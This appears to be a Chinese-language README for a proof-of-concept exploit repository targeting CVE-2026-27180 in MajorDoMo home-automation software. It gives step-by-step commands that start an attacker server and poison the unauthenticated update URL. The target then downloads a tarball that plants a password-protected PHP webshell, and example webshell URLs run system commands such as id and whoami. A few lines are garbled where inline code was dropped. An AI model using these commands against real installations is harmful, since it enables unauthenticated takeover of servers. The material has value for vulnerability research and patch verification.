
CVE-2026-27180 的概念验证漏洞利用程序,通过更新 URL 投毒在 MajorDoMo 中实现未认证远程代码执行(RCE),将 WebShell 投递至 Web 根目录。
MajorDoMo 中通过更新 URL 投毒实现未认证远程代码执行
CWE-494 – 下载无完整性校验的代码
影响:通过放置在 Web 根目录的 webshell 实现服务器完全沦陷
认证要求:无
补丁:PR #1177
本仓库包含针对 CVE-2026-27180 的概念验证漏洞利用程序——这是 MajorDoMo 智能家居自动化软件中的一个严重未认证远程代码执行漏洞。
攻击者可以:
该漏洞存在的原因:
auto_update_settings 和 force_update 模式没有认证检查CURLOPT_SSL_VERIFYPEER = false)poc.php).htaccess 用于强制 PHP 执行git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# 无需 pip install – 仅使用标准库 + argparse
graph TD
A["攻击者启动恶意 HTTP 服务器\n提供 /master.xml + /archive/master.tar.gz"] --> B["攻击者投毒更新 URL\n通过 GET /objects/?module=saverestore&mode=auto_update_settings\n&set_update_url=http://attacker:8080"]
B --> C["攻击者触发更新\nGET /objects/?module=saverestore&mode=force_update"]
C --> D["MajorDoMo 获取被投毒的 Atom feed"]
D --> E["下载恶意 master.tar.gz\n(CURLOPT_SSL_VERIFYPEER=false)"]
E --> F["使用 tar xzvf ... 解压 tar.gz"]
F --> G["copyTree() 递归复制文件\n→ poc.php 和 .htaccess 落入 Web 根目录"]
G --> H["攻击者访问 webshell\nhttp://target/poc.php?pass=ChangeMe123&cmd=id"]
style A fill:#f9d5e5,stroke:#333,stroke-width:2px
style H fill:#c3e6cb,stroke:#333,stroke-width:2px
启动恶意服务器:
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080
服务器启动后,针对目标运行以下命令:
# 1. 投毒更新源
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'
# 2. 触发强制更新
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'
等待 10–90 秒,然后测试 webshell:
# 示例:
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a
本代码严格仅供教育目的、授权安全测试和红队活动使用。
MIT 许可证
版权所有 © 2026 Mohammed Idrees Banyamer
特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人无限制地处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或出售软件副本的权利,并允许向其提供本软件的人员这样做,但须满足以下条件:
上述版权声明和本许可声明应包含在本软件的所有副本或实质性部分中。
本软件按“原样”提供,不作任何明示或暗示的保证,包括但不限于适销性、特定用途适用性和非侵权性的保证。在任何情况下,作者或版权持有人均不对任何索赔、损害或其他责任负责,无论是在合同诉讼、侵权或其他诉讼中,由本软件或本软件的使用或其他交易引起、产生或与之相关的。